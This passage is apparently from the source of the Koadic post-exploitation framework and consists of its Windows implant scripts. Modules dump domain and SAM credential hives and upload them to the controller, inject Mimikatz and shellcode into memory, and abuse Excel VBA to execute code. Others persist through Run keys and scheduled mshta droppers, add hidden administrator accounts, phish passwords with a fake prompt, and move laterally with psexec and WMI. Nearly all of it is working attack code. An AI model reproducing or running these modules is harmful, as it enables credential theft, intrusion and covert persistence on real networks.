= session.Antecedent+ "\n" + session.Dependent; 30 | //var str = stringify_user(session, eAssoc); 31 | alert(str) 32 | //var assocs = wmi.ExecQuery("Associators of {Win32_LogonSession.LogonId=" + session.LogonId + "} Where AssocClass=Win32_LoggedOnUser Role=Dependent"); 33 | 34 | 35 | //for (var eAssoc = new Enumerator(assocs); !eAssoc.atEnd(); eAssoc.moveNext()) 36 | //{ 37 | // var str = stringify_user(session, eAssoc); 38 | // alert(str) 39 | //} 40 | 41 | Koadic.work.report(str); 42 | } 43 | 44 | Koadic.work.report("done"); 45 | } catch (e) { 46 | alert(e) 47 | Koadic.work.error(e); 48 | } 49 | 50 | Koadic.exit(); 51 | -------------------------------------------------------------------------------- /data/implant/gather/hashdump_dc.js: -------------------------------------------------------------------------------- 1 | try { 2 | var ntds_path = Koadic.file.getPath("~RPATH~\\~NTDSFILE~"); 3 | var sysh_path = Koadic.file.getPath("~RPATH~\\~SYSHFILE~"); 4 | 5 | // step 1. create and send .dit file, delete 6 | 7 | // todo: detect if shadow copy already available? 8 | 9 | var outp = Koadic.shell.exec("vssadmin create shadow /for=~DRIVE~", "~RPATH~\\~NTDSFILE~1.txt"); 10 | 11 | var shadow = outp.split("Shadow Copy Volume Name: ")[1].split('\n')[0]; 12 | var shadowid = outp.split("Shadow Copy ID: ")[1].split('\n')[0]; 13 | 14 | //Koadic.shell.run("copy " + shadow + "\\windows\\ntds\\ntds.dit " + ntds_path, false); 15 | var unused = Koadic.shell.exec("copy " + shadow + "\\windows\\ntds\\ntds.dit " + ntds_path, "~RPATH~\\~NTDSFILE~2.txt"); 16 | Koadic.http.upload(ntds_path, "~NTDSFILE~", ~CERTUTIL~, "~UUIDHEADER~"); 17 | Koadic.file.deleteFile(ntds_path); 18 | 19 | // step 2. create, send SYSTEM hive, delete 20 | Koadic.shell.run("reg save HKLM\\SYSTEM " + sysh_path + " /y", false); 21 | Koadic.http.upload(sysh_path, "~SYSHFILE~", ~CERTUTIL~, "~UUIDHEADER~"); 22 | Koadic.file.deleteFile(sysh_path); 23 | var discard = Koadic.shell.exec("vssadmin delete shadows /shadow="+shadowid+" /quiet", "~RPATH~\\"+Koadic.uuid()+".txt"); 24 | 25 | // step 3. general complete 26 | Koadic.work.report("Complete"); 27 | } catch (e) { 28 | Koadic.work.error(e); 29 | } 30 | 31 | Koadic.exit(); 32 | -------------------------------------------------------------------------------- /data/implant/gather/hashdump_sam.js: -------------------------------------------------------------------------------- 1 | function GetSysKey() 2 | { 3 | var jdpath = Koadic.file.getPath("~RPATH~\\42JD"); 4 | var skew1path = Koadic.file.getPath("~RPATH~\\42Skew1"); 5 | var gbgpath = Koadic.file.getPath("~RPATH~\\42GBG"); 6 | var datapath = Koadic.file.getPath("~RPATH~\\42Data"); 7 | 8 | Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\JD" + " " + jdpath + " /y", false); 9 | Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Skew1" + " " + skew1path + " /y", false); 10 | Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\GBG" + " " + gbgpath + " /y", false); 11 | Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Data" + " " + datapath + " /y", false); 12 | 13 | var data = Koadic.file.readBinary(jdpath); 14 | data += "~~~"+Koadic.file.readBinary(skew1path); 15 | data += "~~~"+Koadic.file.readBinary(gbgpath); 16 | data += "~~~"+Koadic.file.readBinary(datapath); 17 | 18 | var headers = {}; 19 | headers["Task"] = "SysKey"; 20 | 21 | if (Koadic.user.encoder != "936") 22 | { 23 | data = data.replace(/\\/g, "\\\\"); 24 | data = data.replace(/\0/g, "\\0"); 25 | } 26 | 27 | try 28 | { 29 | headers["encoder"] = Koadic.user.encoder(); 30 | } 31 | catch (e) 32 | { 33 | headers["encoder"] = "1252"; 34 | } 35 | 36 | Koadic.work.report(data, headers); 37 | Koadic.file.deleteFile(jdpath); 38 | Koadic.file.deleteFile(skew1path); 39 | Koadic.file.deleteFile(gbgpath); 40 | Koadic.file.deleteFile(datapath); 41 | } 42 | 43 | function DumpHive(name, uuid) 44 | { 45 | var path = Koadic.file.getPath("~RPATH~\\" + uuid); 46 | 47 | Koadic.shell.run("reg save HKLM\\" + name + " " + path + " /y", false); 48 | 49 | Koadic.http.upload(path, name, ~CERTUTIL~, "Task"); 50 | Koadic.file.deleteFile(path); 51 | } 52 | 53 | try 54 | { 55 | DumpHive("SAM", "42SAM"); 56 | DumpHive("SECURITY", "42SECURITY"); 57 | if (~GETSYSHIVE~) 58 | { 59 | DumpHive("SYSTEM", "42SYSTEM"); 60 | } 61 | else 62 | { 63 | GetSysKey(); 64 | } 65 | 66 | Koadic.work.report("Complete"); 67 | } 68 | catch (e) 69 | { 70 | Koadic.work.error(e); 71 | } 72 | 73 | Koadic.exit(); 74 | -------------------------------------------------------------------------------- /data/implant/gather/loot_finder.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var tmpfile = "~DIRECTORY~\\" + Koadic.uuid() + ".txt"; 4 | var loot = Koadic.shell.exec("dir ~LOOTD~ /s /b | findstr /I \"~LOOTE~ ~LOOTF~\"", tmpfile); 5 | Koadic.work.report(loot); 6 | } 7 | catch (e) 8 | { 9 | Koadic.work.error(e) 10 | } 11 | 12 | Koadic.exit(); 13 | -------------------------------------------------------------------------------- /data/implant/inject/mimikatz_dynwrapx.js: -------------------------------------------------------------------------------- 1 | function win32_register_via_dynwrapx(manifestPath) 2 | { 3 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 4 | 5 | actCtx.Manifest = manifestPath; 6 | 7 | var win32 = actCtx.CreateObject("DynamicWrapperX"); 8 | 9 | win32.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function 10 | win32.Register("kernel32.dll", "VirtualAlloc", "i=puuu", "r=p"); 11 | win32.Register("kernel32.dll", "OpenProcess", "i=uuu", "r=h"); 12 | win32.Register("kernel32.dll", "GetCurrentProcess", "r=h"); 13 | win32.Register("kernel32.dll", "WriteProcessMemory", "i=hllll", "r=u"); 14 | win32.Register("kernel32.dll", "CreateThread", "i=llplll", "r=h"); 15 | win32.Register("kernel32.dll", "WaitForSingleObject", "i=hu", "r=u"); 16 | 17 | return win32; 18 | } 19 | 20 | function win32_write_memory(win32, str) 21 | { 22 | var commit = 0x00003000; /* MEM_COMMIT | MEM_RESERVE */ 23 | var guard = 0x40; /*PAGE_EXECUTE_READWRITE*/ 24 | 25 | var pMem = win32.VirtualAlloc(0, str.length * 4, commit, guard); 26 | var pProcess = win32.GetCurrentProcess(); 27 | 28 | for (var i = 0; i < str.length; ++i) 29 | { 30 | win32.NumPut(str[i], pMem, i * 4, "u"); 31 | } 32 | 33 | return pMem; 34 | } 35 | 36 | try 37 | { 38 | var manifestPath = Koadic.file.getPath("~DIRECTORY~\\dynwrapx.manifest"); 39 | Koadic.http.download(manifestPath, "~MANIFESTUUID~"); 40 | 41 | Koadic.http.download("~DIRECTORY~\\dynwrapx.dll", "~DLLUUID~"); 42 | 43 | var win32 = win32_register_via_dynwrapx(manifestPath) 44 | var shim_lpParam = "~MIMICMD~~~~UUIDHEADER~~~~SHIMX64UUID~~~~MIMIX86UUID~~~~MIMIX64UUID~~~" + Koadic.work.make_url(); 45 | 46 | var arrDLL = [ 47 | ~SHIMX86BYTES~ 48 | ]; 49 | 50 | var pMem = win32_write_memory(win32, arrDLL); 51 | 52 | var pReflective = pMem + ~SHIMX86OFFSET~; 53 | 54 | var thread = win32.CreateThread(0, 0, pReflective, win32.StrPtr(shim_lpParam), 0, 0); 55 | win32.WaitForSingleObject(thread, 100000); 56 | 57 | //Koadic.work.report("Success"); 58 | } 59 | catch (e) 60 | { 61 | Koadic.work.error(e); 62 | } 63 | 64 | Koadic.file.deleteFile(manifestPath); 65 | Koadic.exit(); 66 | -------------------------------------------------------------------------------- /data/implant/inject/mimikatz_tashlib.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var manifestPath = Koadic.file.getPath("~DIRECTORY~\\TashLib.manifest"); 4 | Koadic.http.download(manifestPath, "~MANIFESTUUID~"); 5 | 6 | Koadic.http.download("~DIRECTORY~\\TashLib.dll", "~DLLUUID~"); 7 | 8 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 9 | actCtx.Manifest = manifestPath; 10 | var tash = actCtx.CreateObject("TashLib.TashLoader"); 11 | 12 | var shim_lpParam = "~MIMICMD~~~~UUIDHEADER~~~~SHIMX64UUID~~~~MIMIX86UUID~~~~MIMIX64UUID~~~" + Koadic.work.make_url(); 13 | 14 | // TSC = "\x..." 15 | ~SHIMX86BYTES~ 16 | 17 | var res = tash.Load(TSC, shim_lpParam, ~SHIMX86OFFSET~); 18 | 19 | Koadic.work.report("Success"); 20 | } 21 | catch (e) 22 | { 23 | Koadic.work.error(e); 24 | } 25 | 26 | Koadic.file.deleteFile(manifestPath); 27 | Koadic.exit(); 28 | -------------------------------------------------------------------------------- /data/implant/inject/reflectdll_excel.js: -------------------------------------------------------------------------------- 1 | try { 2 | var objExcel = new ActiveXObject("Excel.Application"); 3 | objExcel.Visible = false; 4 | var Application_Version = objExcel.Version;//Auto-Detect Version 5 | var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; 6 | 7 | var WshShell = new ActiveXObject("WScript.Shell"); 8 | WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); 9 | var objWorkbook = objExcel.Workbooks.Add(); 10 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); 11 | 12 | strCode = '#If Vba7 Then\n' 13 | strCode += 'Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal cmd As String, ByVal nCmdShow As Long) As LongPtr\n' 14 | strCode += '#Else\n' 15 | strCode += 'Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal cmd As String, ByVal nCmdShow As Long) As Long\n' 16 | strCode += '#EndIf\n' 17 | strCode += '\n' 18 | strCode += 'Sub ExecShell\n' 19 | strCode += ' Dim i As Long\n' 20 | strCode += ' i = WinExec("cmd.exe", 1)\n' 21 | strCode += 'End Sub\n' 22 | 23 | xlmodule.CodeModule.AddFromString(strCode); 24 | var wut = "ExecShell"; 25 | objExcel.Run(wut); 26 | objExcel.DisplayAlerts = false; 27 | objWorkbook.Close(false); 28 | 29 | Koadic.work.report("Success"); 30 | } catch (e) { 31 | Koadic.work.error(e); 32 | } 33 | 34 | Koadic.exit(); 35 | -------------------------------------------------------------------------------- /data/implant/inject/shellcode.vba: -------------------------------------------------------------------------------- 1 | #If Vba7 Then 2 | Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr 3 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr 4 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr 5 | Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) 6 | #Else 7 | Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long 8 | Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long 9 | Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long 10 | Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long) 11 | #EndIf 12 | 13 | Sub ExecShell 14 | Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long 15 | #If Vba7 Then 16 | Dim Xlbufvetp As LongPtr 17 | #Else 18 | Dim Xlbufvetp As Long 19 | #EndIf 20 | Hyeyhafxp = Array(~SHELLCODEDECCSV~) 21 | Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40) 22 | For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp) 23 | Wyzayxya = Hyeyhafxp(Zolde) 24 | Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1) 25 | Next Zolde 26 | Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0) 27 | Sleep ~SLEEP~ 28 | End Sub 29 | -------------------------------------------------------------------------------- /data/implant/inject/shellcode_dynwrapx.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | Koadic.http.download("~DIRECTORY~/dynwrapx.dll", "~DLLUUID~"); 4 | Koadic.http.download("~DIRECTORY~/dynwrapx.manifest", "~MANIFESTUUID~"); 5 | 6 | Koadic.work.report("Success"); 7 | } 8 | catch (e) 9 | { 10 | Koadic.work.error(e); 11 | } 12 | 13 | Koadic.exit(); 14 | -------------------------------------------------------------------------------- /data/implant/inject/shellcode_excel.js: -------------------------------------------------------------------------------- 1 | try { 2 | var objExcel = new ActiveXObject("Excel.Application"); 3 | objExcel.Visible = false; 4 | var Application_Version = objExcel.Version;//Auto-Detect Version 5 | var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; 6 | 7 | var WshShell = new ActiveXObject("WScript.Shell"); 8 | WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); 9 | var objWorkbook = objExcel.Workbooks.Add(); 10 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); 11 | 12 | strCode = '~VBACODE~' 13 | 14 | xlmodule.CodeModule.AddFromString(strCode); 15 | var wut = "ExecShell"; 16 | objExcel.Run(wut); 17 | objExcel.DisplayAlerts = false; 18 | objWorkbook.Close(false); 19 | 20 | Koadic.work.report("Success"); 21 | } catch (e) { 22 | Koadic.work.error(e); 23 | } 24 | 25 | Koadic.exit(); 26 | -------------------------------------------------------------------------------- /data/implant/manage/enable_rdesktop.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var path = "System\\CurrentControlSet\\Control\\Terminal Server"; 4 | var key = "fDenyTsConnections"; 5 | 6 | Koadic.registry.write(Koadic.registry.HKLM, path, key, ~MODE~, Koadic.registry.DWORD); 7 | var out = Koadic.registry.read(Koadic.registry.HKLM, path, key, Koadic.registry.DWORD); 8 | 9 | if (out.uValue != ~MODE~) 10 | throw new Error("Unable to write to registry key."); 11 | 12 | Koadic.work.report(""); 13 | } 14 | catch(e) 15 | { 16 | Koadic.work.error(e); 17 | } 18 | 19 | Koadic.exit() 20 | -------------------------------------------------------------------------------- /data/implant/manage/enable_rdesktop.vbs: -------------------------------------------------------------------------------- 1 | sub EnableRDesktop 2 | Const HKEY_LOCAL_MACHINE = &H80000002 3 | Const ERROR_ACCESS_DENIED = 5 4 | strKeyPath = "System\CurrentControlSet\Control\Terminal Server" 5 | strValueName = "fDenyTsConnections" 6 | Set objRegistry = GetObject("winmgmts:\\.\root\default:StdRegProv") 7 | objRegistry.CreateKey HKEY_LOCAL_MACHINE, strKeyPath 8 | objRegistry.SetDWORDValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, ~MODE~ 9 | objRegistry.GetDWORDValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, dwValue 10 | if dwValue <> ~MODE~ then 11 | err.raise ERROR_ACCESS_DENIED 12 | end if 13 | end sub 14 | 15 | EnableRDesktop 16 | KoReportWork "" 17 | KoExit 18 | -------------------------------------------------------------------------------- /data/implant/manage/exec_cmd.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var readout = ~OUTPUT~; 4 | if (readout) 5 | { 6 | var output = Koadic.shell.exec("~FCMD~", "~FDIRECTORY~\\"+Koadic.uuid()+".txt"); 7 | } 8 | else 9 | { 10 | var output = ""; 11 | Koadic.shell.run("~FCMD~"); 12 | Koadic.work.report(); 13 | } 14 | 15 | if (output != "") 16 | { 17 | Koadic.work.report(output); 18 | } 19 | } 20 | catch (e) 21 | { 22 | Koadic.work.error(e); 23 | } 24 | 25 | Koadic.exit(); 26 | -------------------------------------------------------------------------------- /data/implant/manage/exec_cmd.vbs: -------------------------------------------------------------------------------- 1 | path = KoGetPath("~DIRECTORY~\~FILE~.txt") 2 | output = KoExecCmd("~CMD~", path) 3 | 4 | KoReportWork output 5 | 6 | KoExit 7 | -------------------------------------------------------------------------------- /data/implant/manage/killav.vbs: -------------------------------------------------------------------------------- 1 | Dim objWMIService, objProcess, colProcess 2 | Dim strComputer, strList 3 | 4 | Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 5 | 6 | Set colProcess = objWMIService.ExecQuery("Select * from Win32_Process") 7 | 8 | For Each objProcess in colProcess 9 | strList = strList & vbCr & objProcess.Name 10 | Next 11 | 12 | MsgBox strList 13 | -------------------------------------------------------------------------------- /data/implant/persist/add_user.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | 4 | var headers = {}; 5 | 6 | if (~CLEANUP~) 7 | { 8 | var del_user_command = "net user ~USERNAME~ /DEL"; 9 | var output = Koadic.shell.exec(del_user_command, "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 10 | headers["Task"] = "DeleteUser"; 11 | Koadic.work.report(output, headers); 12 | } 13 | else 14 | { 15 | var add_user_command = "net user ~USERNAME~ ~PASSWORD~ /ADD"; 16 | if (~DOMAIN~) 17 | { 18 | add_user_command += " /DOMAIN"; 19 | } 20 | var output = Koadic.shell.exec(add_user_command, "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 21 | headers["Task"] = "CreateUser"; 22 | Koadic.work.report(output, headers); 23 | if (output.indexOf("error") != -1) 24 | { 25 | throw ""; 26 | } 27 | 28 | if (~ADMIN~) 29 | { 30 | if (~DOMAIN~) 31 | { 32 | output = Koadic.shell.exec("net group \"Domain Admins\" ~USERNAME~ /ADD /DOMAIN", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 33 | } 34 | else 35 | { 36 | output = Koadic.shell.exec("net localgroup Administrators ~USERNAME~ /ADD", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 37 | } 38 | headers["Task"] = "MakeAdmin"; 39 | Koadic.work.report(output, headers); 40 | } 41 | } 42 | 43 | Koadic.work.report("Complete"); 44 | 45 | } 46 | catch (e) 47 | { 48 | Koadic.work.error(e); 49 | } 50 | 51 | Koadic.exit(); 52 | -------------------------------------------------------------------------------- /data/implant/persist/registry.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var headers = {}; 4 | var path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; 5 | var droppath = Koadic.file.getPath("~FDROPDIR~\\~FDROPFILE~"); 6 | var key = "K0adic"; 7 | 8 | if (~CLEANUP~) 9 | { 10 | headers["Task"] = "DeleteKey"; 11 | var hkey = ~FHKEY~; 12 | var hkeyname = ""; 13 | switch(hkey) 14 | { 15 | case 0x80000001: 16 | hkeyname = "HKCU"; 17 | break; 18 | case 0x80000002: 19 | hkeyname = "HKLM"; 20 | break; 21 | default: 22 | break; 23 | } 24 | var retval = Koadic.shell.exec("reg delete "+hkeyname+"\\"+path+" /v "+key+" /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 25 | Koadic.work.report(retval, headers); 26 | headers["Task"] = "DeleteDropper"; 27 | Koadic.file.deleteFile(droppath); 28 | Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers); 29 | } 30 | else 31 | { 32 | Koadic.registry.write(~FHKEY~, path, key, "C:\\Windows\\system32\\mshta.exe "+droppath, Koadic.registry.STRING); 33 | headers["Task"] = "AddKey"; 34 | var retval = Koadic.registry.read(~FHKEY~, path, key, Koadic.registry.STRING).SValue; 35 | Koadic.work.report(retval, headers); 36 | 37 | headers["X-UploadFileJob"] = "true"; 38 | Koadic.http.downloadEx("POST", Koadic.work.make_url(), headers, droppath); 39 | headers["X-UploadFileJob"] = "false"; 40 | headers["Task"] = "AddDropper"; 41 | Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers); 42 | } 43 | 44 | Koadic.work.report("Complete"); 45 | 46 | } 47 | catch (e) 48 | { 49 | Koadic.work.error(e); 50 | } 51 | 52 | Koadic.exit(); 53 | -------------------------------------------------------------------------------- /data/implant/persist/schtasks.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var headers = {}; 4 | var taskname = "K0adic"; 5 | var droppath = Koadic.file.getPath("~FDROPDIR~\\~FDROPFILE~"); 6 | if (~CLEANUP~) 7 | { 8 | var result = Koadic.shell.exec("schtasks /delete /tn "+taskname+" /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 9 | headers["Task"] = "DeleteTask"; 10 | Koadic.work.report(result, headers); 11 | headers["Task"] = "DeleteDropper"; 12 | Koadic.file.deleteFile(droppath); 13 | Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers); 14 | } 15 | else 16 | { 17 | var result = Koadic.shell.exec("schtasks /query /tn "+taskname, "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 18 | headers["Task"] = "QueryTask"; 19 | Koadic.work.report(result, headers); 20 | if (~NOFORCE~) 21 | { 22 | if (result.indexOf("ERROR") == -1) 23 | { 24 | result = Koadic.shell.exec("schtasks /delete /tn "+taskname+" /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 25 | headers["Task"] = "NoForceTask"; 26 | Koadic.work.report("", headers); 27 | } 28 | } 29 | if (~ELEVATED~) 30 | { 31 | result = Koadic.shell.exec("schtasks /create /tn "+taskname+" /tr \"C:\\Windows\\system32\\mshta.exe "+droppath+"\" /sc onlogon /ru System /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 32 | } 33 | else 34 | { 35 | result = Koadic.shell.exec("schtasks /create /tn "+taskname+" /tr \"C:\\Windows\\system32\\mshta.exe "+droppath+"\" /sc onidle /i 1 /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 36 | } 37 | headers["Task"] = "AddTask"; 38 | Koadic.work.report(result, headers); 39 | 40 | headers["X-UploadFileJob"] = "true"; 41 | Koadic.http.downloadEx("POST", Koadic.work.make_url(), headers, droppath); 42 | headers["X-UploadFileJob"] = "false"; 43 | headers["Task"] = "AddDropper"; 44 | Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers); 45 | } 46 | Koadic.work.report("Complete"); 47 | } 48 | catch (e) 49 | { 50 | Koadic.work.error(e); 51 | } 52 | Koadic.exit(); 53 | -------------------------------------------------------------------------------- /data/implant/phish/password_box.js: -------------------------------------------------------------------------------- 1 | try { 2 | // cool stuff! 3 | // http://with-love-from-siberia.blogspot.com/2009/12/msgbox-inputbox-in-jscript.html 4 | 5 | // but it didn't work? :[ 6 | 7 | /* 8 | var vb = {}; 9 | 10 | vb.Function = function(func) 11 | { 12 | return function() 13 | { 14 | return vb.Function.eval.call(this, func, arguments); 15 | }; 16 | }; 17 | 18 | 19 | vb.Function.eval = function(func) 20 | { 21 | var args = Array.prototype.slice.call(arguments[1]); 22 | for (var i = 0; i < args.length; i++) { 23 | if ( typeof args[i] != 'string' ) { 24 | continue; 25 | } 26 | args[i] = '"' + args[i].replace(/"/g, '" + Chr(34) + "') + '"'; 27 | } 28 | 29 | var vbe; 30 | alert("yo") 31 | vbe = new ActiveXObject('ScriptControl'); 32 | vbe.Language = 'VBScript'; 33 | 34 | return vbe.eval(func + '(' + args.join(', ') + ')'); 35 | }; 36 | */ 37 | 38 | /** 39 | * InputBox(prompt[, title][, default][, xpos][, ypos][, helpfile, context]) 40 | */ 41 | //var InputBox = vb.Function('InputBox'); 42 | 43 | // var a = InputBox("~MESSAGE~") 44 | 45 | var a = prompt("~MESSAGE~", ""); 46 | Koadic.work.report(a); 47 | 48 | } catch (e) { 49 | Koadic.work.error(e); 50 | } 51 | 52 | Koadic.exit(); 53 | -------------------------------------------------------------------------------- /data/implant/phish/password_box.vbs: -------------------------------------------------------------------------------- 1 | a = inputbox("~MESSAGE~") 2 | -------------------------------------------------------------------------------- /data/implant/pivot/exec_psexec.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var rpath = "~RPATH~" 4 | var UNC = "~RPATH~\\psexec.exe "; 5 | var domain = "~SMBDOMAIN~"; 6 | var user = "~SMBUSER~"; 7 | var pwd = "~SMBPASS~"; 8 | var computer = "\\\\~RHOST~ "; 9 | 10 | UNC += computer; 11 | 12 | if (user != "" && pwd != "") 13 | { 14 | if (domain != "") 15 | { 16 | user = '"' + domain + "\\" + user + '"'; 17 | } 18 | 19 | UNC += "-u " + user + " -p " + pwd + " "; 20 | } 21 | 22 | UNC += " -accepteula ~CMD~"; 23 | 24 | // crappy hack to make sure it mounts 25 | 26 | var output = Koadic.shell.exec("net use * " + rpath, "~DIRECTORY~\\"+Koadic.uuid()+".txt"); 27 | 28 | if (output.indexOf("Drive") != -1) 29 | { 30 | var drive = output.split(" ")[1]; 31 | Koadic.shell.run("net use " + drive + " /delete", true); 32 | } 33 | Koadic.WS.Run("%comspec% /q /c " + UNC, 0, true); 34 | 35 | Koadic.work.report("Complete"); 36 | } 37 | catch (e) 38 | { 39 | Koadic.work.error(e); 40 | } 41 | 42 | Koadic.exit(); 43 | -------------------------------------------------------------------------------- /data/implant/pivot/exec_wmi.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var status = -1; 4 | 5 | var objSWbemLocator = new ActiveXObject("WbemScripting.SWbemLocator"); 6 | 7 | 8 | objSWbemLocator.Security_.ImpersonationLevel = 3; 9 | objSWbemLocator.Security_.AuthenticationLevel = 6; 10 | var objSWbemServices = objSWbemLocator.ConnectServer("~RHOST~", "root\\cimv2", "~SMBDOMAIN~\\~SMBUSER~", "~SMBPASS~"); 11 | 12 | objSWbemServices.Security_.ImpersonationLevel = 3; 13 | objSWbemServices.Security_.AuthenticationLevel = 6; 14 | 15 | var intProcessID = 0; 16 | var objProcess = objSWbemServices.Get("Win32_Process"); 17 | //alert("~CMD~"); 18 | status = objProcess.Create("~CMD~", null, null, intProcessID); 19 | 20 | Koadic.work.report(status); 21 | } 22 | catch (e) 23 | { 24 | //alert(e.message); 25 | Koadic.work.report(e.message); 26 | } 27 | 28 | Koadic.exit(); 29 | -------------------------------------------------------------------------------- /data/implant/pivot/exec_wmi.vbs: -------------------------------------------------------------------------------- 1 | sub ExecWMI 2 | set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator") 3 | 'MsgBox "o" 4 | set objSWbemServices = objSWbemLocator.ConnectServer("~RHOST~", "root\cimv2", "~SMBDOMAIN~\~SMBUSER~", "~SMBPASS~") 5 | 6 | objSWbemServices.Security_.ImpersonationLevel = 3 7 | objSWbemServices.Security_.AuthenticationLevel = 6 8 | 9 | set objProcess = objSWbemServices.Get("Win32_Process") 10 | errReturn = objProcess.Create("~CMD~", null, null, intProcessID) 11 | end sub 12 | 13 | dim errReturn 14 | errReturn = -1 15 | 16 | ExecWMI 17 | KoReportWork errReturn 18 | KoExit 19 | -------------------------------------------------------------------------------- /data/implant/scan/tcp.js: -------------------------------------------------------------------------------- 1 | function TestPortMSHTA(url) 2 | { 3 | var ret = {}; 4 | ret.status = "unknown"; 5 | ret.errno = -1; 6 | 7 | var ABNORMAL_TERMINATION = -2147012866; 8 | var UNSUPPORTED_PORT = -2147012795; 9 | var CONNECTION_ERROR = -2147012867; 10 | var WRONG_PROTOCOL = -2147012744; 11 | var OPERATION_CANCELED = -2147012879; 12 | 13 | try 14 | { 15 | var objHTTP = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 16 | objHTTP.Open("GET", url, true); 17 | objHTTP.Send(); 18 | objHTTP.WaitForResponse(~TIMEOUT~); 19 | 20 | ret.status = "open"; 21 | ret.errno = 0; 22 | } 23 | catch(err) 24 | { 25 | ret.errno = err.number; 26 | 27 | if (err.number == UNSUPPORTED_PORT) 28 | ret.status = "unsupported"; 29 | else if (err.number == CONNECTION_ERROR) 30 | ret.status = "closed"; 31 | else if (err.number == WRONG_PROTOCOL || err.number == ABNORMAL_TERMINATION || err.number == OPERATION_CANCELED) 32 | ret.status = "open"; 33 | } 34 | 35 | return ret; 36 | } 37 | 38 | function TestPort(ip, port) 39 | { 40 | var url = "http://" + ip + ":" + port; 41 | return TestPortMSHTA(url); 42 | } 43 | 44 | 45 | ~RHOSTSARRAY~ 46 | 47 | ~RPORTSARRAY~ 48 | 49 | function status_string(status, ip, port, err) 50 | { 51 | return status + "\n" + ip + "\n" + port + "\n" + err; 52 | } 53 | 54 | try 55 | { 56 | for (var idx in ips) 57 | { 58 | var ip = ips[idx]; 59 | var test = "closed"; 60 | var testerrno = 0; 61 | if (~CHECKLIVE~) 62 | { 63 | // ghetto check if the IP is up 64 | var testport = TestPort(ip, 1); 65 | test = testport.status; 66 | testerrno = testport.errno; 67 | } 68 | if (test == "closed") 69 | { 70 | for (var pdx in ports) 71 | { 72 | var port = ports[pdx]; 73 | var ret = TestPort(ip, port); 74 | Koadic.work.report(status_string(ret.status, ip, port, ret.errno)); 75 | } 76 | } 77 | else 78 | { 79 | Koadic.work.report(status_string("not up", ip, 1, testerrno)); 80 | } 81 | } 82 | 83 | Koadic.work.report("done"); 84 | } 85 | catch(e) 86 | { 87 | Koadic.work.error(e); 88 | } 89 